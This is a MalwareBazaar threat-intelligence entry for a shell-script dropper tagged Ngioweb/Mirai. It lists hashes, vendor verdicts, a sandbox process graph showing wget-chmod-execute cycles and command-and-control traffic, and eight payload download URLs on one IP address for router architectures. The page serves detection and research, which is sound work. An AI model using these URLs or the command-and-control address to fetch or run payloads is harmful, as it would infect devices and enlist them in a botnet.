MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Ngioweb


Vendor detections: 6


Intelligence 6 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125
SHA3-384 hash: 499930061772d81fc41cd604d6d0154212d7ff3193e1cdd440601351ed9e0dc88ce9d0aee434de1c8afc0ac14e3236a7
SHA1 hash: 61d5c837edab0ce64353287e64914cd92998983f
MD5 hash: eb686f37e40a329e6dc441a3868f0b9b
humanhash: texas-india-princess-happy
File name:router-atemi-rep.sh
Download: download sample
Signature Ngioweb
Create hunting rule
File size:824 bytes
First seen:2025-11-08 07:54:35 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 12:7RDzyi+eqDiyi+eqDxyi+eqDHyi+eqDXgyi+eqDvyi+eqD7beyi+eqD7keyi+eN:19+Fs+FD+Fp+Fa+Fx+Fvw+F4w+S
TLSH T16F0192BEC9685CDAD008CB007C706052511EC7CB6DE90B36B3BC2E7340AEA10702B63E
Magika batch
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://69.5.189.168/frost.armv7ddebe545870ecfe87f0d403a1a1bbf0343c4b9ea4e727e2bdb1915f966658435 Ngiowebelf Ngioweb ua-wget
http://69.5.189.168/frost.armv63f2c0e2becb201a5b2cd23b66deaa39b78fbea6cdc64e539edb442b99f5373d4 Ngiowebelf Ngioweb ua-wget
http://69.5.189.168/frost.armv576e670a4333b77d5f69f0a51440618974bfb545309d57d00e6ca847e85631c86 Ngiowebelf Ngioweb ua-wget
http://69.5.189.168/frost.mips8a9b339fd801c708cb76a8204ccce25fa81d06703371c28f832220426886aaf9 Ngiowebelf ua-wget
http://69.5.189.168/frost.mipselcc5dfc104697e85043a20833fc7928418e8a7321b7b6368b37632fd13b1ec4fa Ngiowebelf mirai Ngioweb ua-wget
http://69.5.189.168/frost.aarch641bb57d84b79bdca142f788f2317f6afa1f8071386ac4febc7529214ed995e964 Ngiowebelf mirai Ngioweb ua-wget
http://69.5.189.168/frost.x86eeac99d3cb2e9e9c6c030c9964afccc0886688a0390a7849994146ac0c9604da Ngiowebelf mirai Ngioweb ua-wget
http://69.5.189.168/frost.x86_6407ddef2fde289218f356264bdf1d4409ffa44168c8e98c03ae3c5015ed62fbb4 Ngiowebelf mirai Ngioweb ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
38
Origin country :
DE DE
Vendor Threat Intelligence
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
evasive mirai
Link:
https://www.filescan.io/uploads/690ef7692b74ec26eb6b7b05/reports/1a62caf1-6c6f-4c51-8340-cbea0dea373a/overview
Verdict:
Malicious
File Type:
text
First seen:
2025-11-08T05:23:00Z UTC
Last seen:
2025-11-08T05:57:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/9bf4314c-19b7-4c23-9c2e-027837927a90
Behavior Graph:
Download SVG
%3 guuid=48a59428-1a00-0000-e828-46a3fc0c0000 pid=3324 /usr/bin/sudo guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329 /tmp/sample.bin guuid=48a59428-1a00-0000-e828-46a3fc0c0000 pid=3324->guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329 execve guuid=2d49602b-1a00-0000-e828-46a3030d0000 pid=3331 /usr/bin/wget net send-data write-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=2d49602b-1a00-0000-e828-46a3030d0000 pid=3331 execve guuid=3a017634-1a00-0000-e828-46a3130d0000 pid=3347 /usr/bin/chmod guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=3a017634-1a00-0000-e828-46a3130d0000 pid=3347 execve guuid=31c6c534-1a00-0000-e828-46a3150d0000 pid=3349 /usr/bin/dash guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=31c6c534-1a00-0000-e828-46a3150d0000 pid=3349 clone guuid=fbcf7435-1a00-0000-e828-46a3180d0000 pid=3352 /usr/bin/rm delete-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=fbcf7435-1a00-0000-e828-46a3180d0000 pid=3352 execve guuid=b586c535-1a00-0000-e828-46a3190d0000 pid=3353 /usr/bin/wget net send-data write-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=b586c535-1a00-0000-e828-46a3190d0000 pid=3353 execve guuid=86c17d3c-1a00-0000-e828-46a3250d0000 pid=3365 /usr/bin/chmod guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=86c17d3c-1a00-0000-e828-46a3250d0000 pid=3365 execve guuid=6b14f73c-1a00-0000-e828-46a3270d0000 pid=3367 /usr/bin/dash guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=6b14f73c-1a00-0000-e828-46a3270d0000 pid=3367 clone guuid=f7b39f3d-1a00-0000-e828-46a32a0d0000 pid=3370 /usr/bin/rm delete-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=f7b39f3d-1a00-0000-e828-46a32a0d0000 pid=3370 execve guuid=8a55ef3d-1a00-0000-e828-46a32c0d0000 pid=3372 /usr/bin/wget net send-data write-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=8a55ef3d-1a00-0000-e828-46a32c0d0000 pid=3372 execve guuid=e7a33446-1a00-0000-e828-46a33b0d0000 pid=3387 /usr/bin/chmod guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=e7a33446-1a00-0000-e828-46a33b0d0000 pid=3387 execve guuid=76e89546-1a00-0000-e828-46a33e0d0000 pid=3390 /usr/bin/dash guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=76e89546-1a00-0000-e828-46a33e0d0000 pid=3390 clone guuid=ef811247-1a00-0000-e828-46a3410d0000 pid=3393 /usr/bin/rm delete-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=ef811247-1a00-0000-e828-46a3410d0000 pid=3393 execve guuid=28b44a47-1a00-0000-e828-46a3430d0000 pid=3395 /usr/bin/wget net send-data write-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=28b44a47-1a00-0000-e828-46a3430d0000 pid=3395 execve guuid=7ca22a4f-1a00-0000-e828-46a35d0d0000 pid=3421 /usr/bin/chmod guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=7ca22a4f-1a00-0000-e828-46a35d0d0000 pid=3421 execve guuid=548b704f-1a00-0000-e828-46a35f0d0000 pid=3423 /usr/bin/dash guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=548b704f-1a00-0000-e828-46a35f0d0000 pid=3423 clone guuid=ae290750-1a00-0000-e828-46a3630d0000 pid=3427 /usr/bin/rm delete-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=ae290750-1a00-0000-e828-46a3630d0000 pid=3427 execve guuid=10455850-1a00-0000-e828-46a3650d0000 pid=3429 /usr/bin/wget net send-data write-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=10455850-1a00-0000-e828-46a3650d0000 pid=3429 execve guuid=939c4f58-1a00-0000-e828-46a37f0d0000 pid=3455 /usr/bin/chmod guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=939c4f58-1a00-0000-e828-46a37f0d0000 pid=3455 execve guuid=20a59558-1a00-0000-e828-46a3810d0000 pid=3457 /usr/bin/dash guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=20a59558-1a00-0000-e828-46a3810d0000 pid=3457 clone guuid=5033a459-1a00-0000-e828-46a3850d0000 pid=3461 /usr/bin/rm delete-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=5033a459-1a00-0000-e828-46a3850d0000 pid=3461 execve guuid=813de859-1a00-0000-e828-46a3870d0000 pid=3463 /usr/bin/wget net send-data write-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=813de859-1a00-0000-e828-46a3870d0000 pid=3463 execve guuid=df519d60-1a00-0000-e828-46a39d0d0000 pid=3485 /usr/bin/chmod guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=df519d60-1a00-0000-e828-46a39d0d0000 pid=3485 execve guuid=5d96e060-1a00-0000-e828-46a39e0d0000 pid=3486 /usr/bin/dash guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=5d96e060-1a00-0000-e828-46a39e0d0000 pid=3486 clone guuid=b5516361-1a00-0000-e828-46a3a10d0000 pid=3489 /usr/bin/rm delete-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=b5516361-1a00-0000-e828-46a3a10d0000 pid=3489 execve guuid=7e7fa161-1a00-0000-e828-46a3a30d0000 pid=3491 /usr/bin/wget net send-data write-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=7e7fa161-1a00-0000-e828-46a3a30d0000 pid=3491 execve guuid=af882968-1a00-0000-e828-46a3bb0d0000 pid=3515 /usr/bin/chmod guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=af882968-1a00-0000-e828-46a3bb0d0000 pid=3515 execve guuid=31946568-1a00-0000-e828-46a3bc0d0000 pid=3516 /tmp/bpuh delete-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=31946568-1a00-0000-e828-46a3bc0d0000 pid=3516 execve guuid=1bf28a68-1a00-0000-e828-46a3c20d0000 pid=3522 /usr/bin/rm guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=1bf28a68-1a00-0000-e828-46a3c20d0000 pid=3522 execve guuid=d26fc868-1a00-0000-e828-46a3c30d0000 pid=3523 /usr/bin/wget net send-data write-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=d26fc868-1a00-0000-e828-46a3c30d0000 pid=3523 execve guuid=49fe1370-1a00-0000-e828-46a3c70d0000 pid=3527 /usr/bin/chmod guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=49fe1370-1a00-0000-e828-46a3c70d0000 pid=3527 execve guuid=6ce16670-1a00-0000-e828-46a3c90d0000 pid=3529 /tmp/bpuh delete-file guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=6ce16670-1a00-0000-e828-46a3c90d0000 pid=3529 execve guuid=17a08870-1a00-0000-e828-46a3cc0d0000 pid=3532 /usr/bin/rm guuid=d573082b-1a00-0000-e828-46a3010d0000 pid=3329->guuid=17a08870-1a00-0000-e828-46a3cc0d0000 pid=3532 execve 4e9b299b-312c-5d23-bb91-8d9ae7fb883a 69.5.189.168:80 guuid=2d49602b-1a00-0000-e828-46a3030d0000 pid=3331->4e9b299b-312c-5d23-bb91-8d9ae7fb883a send: 138B guuid=b586c535-1a00-0000-e828-46a3190d0000 pid=3353->4e9b299b-312c-5d23-bb91-8d9ae7fb883a send: 138B guuid=8a55ef3d-1a00-0000-e828-46a32c0d0000 pid=3372->4e9b299b-312c-5d23-bb91-8d9ae7fb883a send: 138B guuid=28b44a47-1a00-0000-e828-46a3430d0000 pid=3395->4e9b299b-312c-5d23-bb91-8d9ae7fb883a send: 137B guuid=10455850-1a00-0000-e828-46a3650d0000 pid=3429->4e9b299b-312c-5d23-bb91-8d9ae7fb883a send: 139B guuid=813de859-1a00-0000-e828-46a3870d0000 pid=3463->4e9b299b-312c-5d23-bb91-8d9ae7fb883a send: 140B guuid=7e7fa161-1a00-0000-e828-46a3a30d0000 pid=3491->4e9b299b-312c-5d23-bb91-8d9ae7fb883a send: 136B guuid=65b17c68-1a00-0000-e828-46a3be0d0000 pid=3518 /tmp/bpuh net send-data zombie guuid=31946568-1a00-0000-e828-46a3bc0d0000 pid=3516->guuid=65b17c68-1a00-0000-e828-46a3be0d0000 pid=3518 clone 5964582a-537a-5ab9-bea4-3571985c6152 69.5.189.168:5555 guuid=65b17c68-1a00-0000-e828-46a3be0d0000 pid=3518->5964582a-537a-5ab9-bea4-3571985c6152 con 6a6ce952-23cd-5c51-b461-6ca6a8c64225 1.0.0.1:53 guuid=65b17c68-1a00-0000-e828-46a3be0d0000 pid=3518->6a6ce952-23cd-5c51-b461-6ca6a8c64225 send: 29B guuid=d26fc868-1a00-0000-e828-46a3c30d0000 pid=3523->4e9b299b-312c-5d23-bb91-8d9ae7fb883a send: 139B guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3530 /tmp/bpuh net send-data zombie guuid=6ce16670-1a00-0000-e828-46a3c90d0000 pid=3529->guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3530 clone guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3530->5964582a-537a-5ab9-bea4-3571985c6152 send: 67B guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3530->6a6ce952-23cd-5c51-b461-6ca6a8c64225 send: 29B guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3648 /tmp/bpuh net net-scan send-data zombie guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3530->guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3648 clone 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3648->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3648|send-data send-data to 256 IP addresses review logs to see them all guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3648->guuid=e4c78170-1a00-0000-e828-46a3ca0d0000 pid=3648|send-data send
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125/
Threat name:
Linux.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2025-11-08 07:55:22 UTC
File Type:
Text (Shell)
AV detection:
10 of 24 (41.67%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=xa7mndyadb6xp6ul63lzffkeoaiwycmii6x5o4bf6ti3b23wkesq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251108-jr9adadr5z/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Ngioweb

sh b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125

(this sample)

Ngioweb

elf d0ca62e68e235aca958e3877ae7ed505c5667207c95d34907bc806e5ffa0b21b

  
URLhaus
https://urlhaus.abuse.ch/url/3700360/
  
Delivery method
Distributed via web download
  
Dropping
MD5 e11a30fbc51aa29573f1bf62762beb1f
  
Dropping
SHA256 d0ca62e68e235aca958e3877ae7ed505c5667207c95d34907bc806e5ffa0b21b

Comments